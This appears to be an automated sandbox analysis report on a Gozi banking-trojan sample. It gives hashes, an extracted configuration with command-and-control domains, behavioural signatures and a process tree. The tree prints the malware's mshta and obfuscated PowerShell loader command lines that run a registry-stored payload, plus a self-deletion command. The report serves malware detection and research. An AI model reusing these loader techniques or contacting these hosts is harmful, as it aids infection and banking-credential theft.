Analysis
-
max time kernel
151s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
06-10-2023 14:31
Static task
static1
Behavioral task
behavioral1
Sample
NEAS.7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6_JC.exe
Resource
win7-20230831-en
General
-
Target
NEAS.7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6_JC.exe
-
Size
304KB
-
MD5
a3f4c907a088c99a8b7bf5f4280d7d0c
-
SHA1
9a9297bd0af1c008eb7477c1e310ce70c30c6d56
-
SHA256
7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6
-
SHA512
106a0a4275a421a6dbef6c43e76921e6eae1aca5f6d960f823763a3127b7ebf826c626da460db82451aba4a94c32c8c198d6871b0a2c6de7d96c937384e92f9b
-
SSDEEP
6144:Oo+91vDNpa6NK56upTHirwtc3nhBvjQOR/Oz2IHTN+:ONDLu4K56u1HqfhBvjQOWz2W
Malware Config
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
http://igrovdow.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral2/memory/3596-1-0x00000000004B0000-0x00000000004BC000-memory.dmp dave -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 3796 set thread context of 3084 3796 powershell.exe Explorer.EXE PID 3084 set thread context of 3780 3084 Explorer.EXE RuntimeBroker.exe PID 3084 set thread context of 4008 3084 Explorer.EXE RuntimeBroker.exe PID 3084 set thread context of 4768 3084 Explorer.EXE RuntimeBroker.exe PID 3084 set thread context of 4724 3084 Explorer.EXE RuntimeBroker.exe PID 3084 set thread context of 1904 3084 Explorer.EXE cmd.exe PID 3084 set thread context of 4368 3084 Explorer.EXE cmd.exe PID 1904 set thread context of 2984 1904 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 2984 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
NEAS.7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6_JC.exepowershell.exeExplorer.EXEpid process 3596 NEAS.7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6_JC.exe 3596 NEAS.7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6_JC.exe 3796 powershell.exe 3796 powershell.exe 3796 powershell.exe 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3084 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 3796 powershell.exe 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 3084 Explorer.EXE 1904 cmd.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 3796 powershell.exe Token: SeShutdownPrivilege 3084 Explorer.EXE Token: SeCreatePagefilePrivilege 3084 Explorer.EXE Token: SeShutdownPrivilege 3084 Explorer.EXE Token: SeCreatePagefilePrivilege 3084 Explorer.EXE Token: SeShutdownPrivilege 3084 Explorer.EXE Token: SeCreatePagefilePrivilege 3084 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3084 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3084 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 2792 wrote to memory of 3796 2792 mshta.exe powershell.exe PID 2792 wrote to memory of 3796 2792 mshta.exe powershell.exe PID 3796 wrote to memory of 560 3796 powershell.exe csc.exe PID 3796 wrote to memory of 560 3796 powershell.exe csc.exe PID 560 wrote to memory of 3388 560 csc.exe cvtres.exe PID 560 wrote to memory of 3388 560 csc.exe cvtres.exe PID 3796 wrote to memory of 1452 3796 powershell.exe csc.exe PID 3796 wrote to memory of 1452 3796 powershell.exe csc.exe PID 1452 wrote to memory of 2600 1452 csc.exe cvtres.exe PID 1452 wrote to memory of 2600 1452 csc.exe cvtres.exe PID 3796 wrote to memory of 3084 3796 powershell.exe Explorer.EXE PID 3796 wrote to memory of 3084 3796 powershell.exe Explorer.EXE PID 3796 wrote to memory of 3084 3796 powershell.exe Explorer.EXE PID 3796 wrote to memory of 3084 3796 powershell.exe Explorer.EXE PID 3084 wrote to memory of 3780 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 3780 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 3780 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 3780 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4008 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4008 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4008 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4008 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4768 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4768 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4768 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4768 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4724 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4724 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4724 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 4724 3084 Explorer.EXE RuntimeBroker.exe PID 3084 wrote to memory of 1904 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 1904 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 1904 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 4368 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 4368 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 4368 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 4368 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 1904 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 1904 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 4368 3084 Explorer.EXE cmd.exe PID 3084 wrote to memory of 4368 3084 Explorer.EXE cmd.exe PID 1904 wrote to memory of 2984 1904 cmd.exe PING.EXE PID 1904 wrote to memory of 2984 1904 cmd.exe PING.EXE PID 1904 wrote to memory of 2984 1904 cmd.exe PING.EXE PID 1904 wrote to memory of 2984 1904 cmd.exe PING.EXE PID 1904 wrote to memory of 2984 1904 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\NEAS.7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6_JC.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6_JC.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tfct='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tfct).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name qkwudvcj -value gp; new-alias -name ypjmemrtt -value iex; ypjmemrtt ([System.Text.Encoding]::ASCII.GetString((qkwudvcj "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aao1rayk\aao1rayk.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2C4B.tmp" "c:\Users\Admin\AppData\Local\Temp\aao1rayk\CSCA383A5EC3FC64DD685F5B9163D992EFF.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qx3bi1rk\qx3bi1rk.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D74.tmp" "c:\Users\Admin\AppData\Local\Temp\qx3bi1rk\CSC3F343B7FF00C4C91916CF02A4DBF17A1.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\NEAS.7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6_JC.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES2C4B.tmpFilesize
1KB
MD5ea4aafe0a3a3696fa11309c62bb9c4e3
SHA1be0f54ec0561ba76c7529902d87532f7b523fa4f
SHA256cab1e09a04e686996b5ea50a437a4a9ec614c2b42ab620289d9ed3b1d01ca99d
SHA512c29510e78458e57b1136ef03c642958c802162b499709581a8a5982d15e02748c1024f9f98eb12515102439662fbcbea6e9014bdd832a14eec0ff3e3fb065f12
-
C:\Users\Admin\AppData\Local\Temp\RES2D74.tmpFilesize
1KB
MD51bf97163c1adebe783d83cbfa2f4f2d7
SHA1478a1bb93e7f1af01df104dfc8563dd3ab767231
SHA2567c5dc34e47f204d0f5492dbb34187bda6426def65772898ff6c4ca84634f8de1
SHA512ea1a17267261653e81deb9ccf34790c4f35ff3226c1da6ba4089f03d13c5131e41e3a0e78174e10c4b0b8745e9399941eeba1eba1b4a961b0b7959e46b27cb3b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_acssny3o.ayw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\aao1rayk\aao1rayk.dllFilesize
3KB
MD5e426405f1ae88e93331179ed301a4b9a
SHA19b7264c9527ac3a5428addf68f8d5a352dc09a9e
SHA256bb43ec4a28a336bfe468562c2bc2410425363b34281def4c90170d68c34f921e
SHA512f694379c5bc9041558a068ffd1606a1b928fd961303321d8a7000fee5648331c323d6d4f96a9c7ca762ef667e5db24f868ff57271968831091848852ffb37632
-
C:\Users\Admin\AppData\Local\Temp\qx3bi1rk\qx3bi1rk.dllFilesize
3KB
MD5233d0c9480fd035e4e219ae7a5a8a49f
SHA1b309f25a33372efa4b30e45e787bf706dae9c8f4
SHA256675bd0712decb4327b927f4eb8bc0a3b4fbd2facdffc11c90b0c261ec14eeffb
SHA512ee629bafda4bbdda201a4274e7ae72d74f5daaaecf024deec5b9bfe4616ff2a4f0df26952e65bace920f2c069437661797a1880f7b2f0e4af01147de5f666db6
-
\??\c:\Users\Admin\AppData\Local\Temp\aao1rayk\CSCA383A5EC3FC64DD685F5B9163D992EFF.TMPFilesize
652B
MD5cc2bd97acf329aafbb6300947990cbd3
SHA1577efb8e8f04caaec0a44d165bc7e4ed3a6dbd15
SHA2562f55f72643cce6cd1efdca867e072648a6513e30780a8b077fb2770122835474
SHA512602c23f75a58f185cc8a8aaef306924622708ccb303ed252bff08470223776a128453b6bc05c3dbe0a59a464c63aacfb65c209fa720fcfa30e7c34a62b04e6bf
-
\??\c:\Users\Admin\AppData\Local\Temp\aao1rayk\aao1rayk.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\aao1rayk\aao1rayk.cmdlineFilesize
369B
MD5c5a48d0a3a49d69db0d97a0ea463c5a6
SHA1e61854dda589bc2b27d00a7742738c5d4551ac9b
SHA256dec8b724f58cb2912bba9e644fe8c9942153c78822d6629745bed099745b26aa
SHA512375d70abc42711026418c76b605533143019ff4344d6a651838478c66907f0ab605fe5ee4890617025f5297a98db4573f70731dbf0a218d12046531bdd463268
-
\??\c:\Users\Admin\AppData\Local\Temp\qx3bi1rk\CSC3F343B7FF00C4C91916CF02A4DBF17A1.TMPFilesize
652B
MD5636253e8038d641e7284721cbab6cdc2
SHA120be56daae51b28870ac031fc01f4feb93fcdc31
SHA25695ba997514434449ab9433f85aad3df11c391924df0ee9d76409485c39f1c3f9
SHA51260b3256a1158e7d7cb2096ee7d5456f1a86d4d5df18ca41549b04f25a73d7e94ad0e20e8a9f8d5d3598e8bc4478b6129b53aee167eb28fc4d19bd5841080fe04
-
\??\c:\Users\Admin\AppData\Local\Temp\qx3bi1rk\qx3bi1rk.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\qx3bi1rk\qx3bi1rk.cmdlineFilesize
369B
MD5e57cf1bf23391f4bab65cd3e27542538
SHA10d1a2bd36fa844578d415e6e384c9771408de5c3
SHA25606bcc7ac4b25e4ed9a436893632e1b35cfa5c55ee7f9178692c529e60f8bef8e
SHA512b5d2509b5ff2c2ad8ffb3d2058262cca6b0a2fa638b9777a3cb734bce6792d917cf3e16e890a6dec7af9f4b778e9d4d9ec288762b74500f3167116f3d77c7e1b
-
memory/1904-103-0x0000015E39180000-0x0000015E39181000-memory.dmpFilesize
4KB
-
memory/1904-98-0x0000015E39360000-0x0000015E39404000-memory.dmpFilesize
656KB
-
memory/1904-119-0x0000015E39360000-0x0000015E39404000-memory.dmpFilesize
656KB
-
memory/2984-110-0x0000023379610000-0x00000233796B4000-memory.dmpFilesize
656KB
-
memory/2984-111-0x00000233796C0000-0x00000233796C1000-memory.dmpFilesize
4KB
-
memory/2984-118-0x0000023379610000-0x00000233796B4000-memory.dmpFilesize
656KB
-
memory/3084-60-0x0000000000A00000-0x0000000000A01000-memory.dmpFilesize
4KB
-
memory/3084-99-0x0000000008810000-0x00000000088B4000-memory.dmpFilesize
656KB
-
memory/3084-59-0x0000000008810000-0x00000000088B4000-memory.dmpFilesize
656KB
-
memory/3596-1-0x00000000004B0000-0x00000000004BC000-memory.dmpFilesize
48KB
-
memory/3596-11-0x0000000002390000-0x000000000239D000-memory.dmpFilesize
52KB
-
memory/3596-5-0x0000000000940000-0x000000000094F000-memory.dmpFilesize
60KB
-
memory/3596-0-0x00000000004C0000-0x00000000004CF000-memory.dmpFilesize
60KB
-
memory/3780-73-0x0000022575510000-0x0000022575511000-memory.dmpFilesize
4KB
-
memory/3780-72-0x0000022575690000-0x0000022575734000-memory.dmpFilesize
656KB
-
memory/3780-113-0x0000022575690000-0x0000022575734000-memory.dmpFilesize
656KB
-
memory/3796-17-0x000002AA2D960000-0x000002AA2D982000-memory.dmpFilesize
136KB
-
memory/3796-69-0x00007FF8BB100000-0x00007FF8BBBC1000-memory.dmpFilesize
10.8MB
-
memory/3796-57-0x000002AA2DD30000-0x000002AA2DD6D000-memory.dmpFilesize
244KB
-
memory/3796-27-0x000002AA2D9B0000-0x000002AA2D9C0000-memory.dmpFilesize
64KB
-
memory/3796-70-0x000002AA2DD30000-0x000002AA2DD6D000-memory.dmpFilesize
244KB
-
memory/3796-26-0x000002AA2D9B0000-0x000002AA2D9C0000-memory.dmpFilesize
64KB
-
memory/3796-55-0x000002AA2DB10000-0x000002AA2DB18000-memory.dmpFilesize
32KB
-
memory/3796-25-0x00007FF8BB100000-0x00007FF8BBBC1000-memory.dmpFilesize
10.8MB
-
memory/3796-28-0x000002AA2D9B0000-0x000002AA2D9C0000-memory.dmpFilesize
64KB
-
memory/3796-41-0x000002AA15380000-0x000002AA15388000-memory.dmpFilesize
32KB
-
memory/4008-78-0x000001FBB30B0000-0x000001FBB3154000-memory.dmpFilesize
656KB
-
memory/4008-79-0x000001FBB3070000-0x000001FBB3071000-memory.dmpFilesize
4KB
-
memory/4008-116-0x000001FBB30B0000-0x000001FBB3154000-memory.dmpFilesize
656KB
-
memory/4368-105-0x00000000009F0000-0x00000000009F1000-memory.dmpFilesize
4KB
-
memory/4368-108-0x0000000001200000-0x0000000001298000-memory.dmpFilesize
608KB
-
memory/4368-100-0x0000000001200000-0x0000000001298000-memory.dmpFilesize
608KB
-
memory/4724-91-0x000001C395FD0000-0x000001C395FD1000-memory.dmpFilesize
4KB
-
memory/4724-90-0x000001C3966E0000-0x000001C396784000-memory.dmpFilesize
656KB
-
memory/4724-120-0x000001C3966E0000-0x000001C396784000-memory.dmpFilesize
656KB
-
memory/4768-117-0x000001A23A3A0000-0x000001A23A444000-memory.dmpFilesize
656KB
-
memory/4768-85-0x000001A2381B0000-0x000001A2381B1000-memory.dmpFilesize
4KB
-
memory/4768-84-0x000001A23A3A0000-0x000001A23A444000-memory.dmpFilesize
656KB